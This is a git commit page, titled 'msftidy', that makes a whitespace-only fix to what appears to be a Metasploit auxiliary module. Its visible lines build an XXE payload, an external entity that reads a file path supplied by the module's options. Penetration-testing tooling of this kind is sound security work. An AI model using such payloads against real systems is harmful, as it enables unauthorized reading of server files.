msftidy
parent
abc0b31f26
commit
bb82277a41
|
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
def run
|
def run
|
||||||
|
|
||||||
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
|
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||||
<!DOCTYPE foo [
|
<!DOCTYPE foo [
|
||||||
<!ELEMENT foo ANY >
|
<!ELEMENT foo ANY >
|
||||||
<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}" >]>
|
<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}" >]>
|
||||||
<Request>
|
<Request>
|
||||||
|
|
Loading…
Reference in New Issue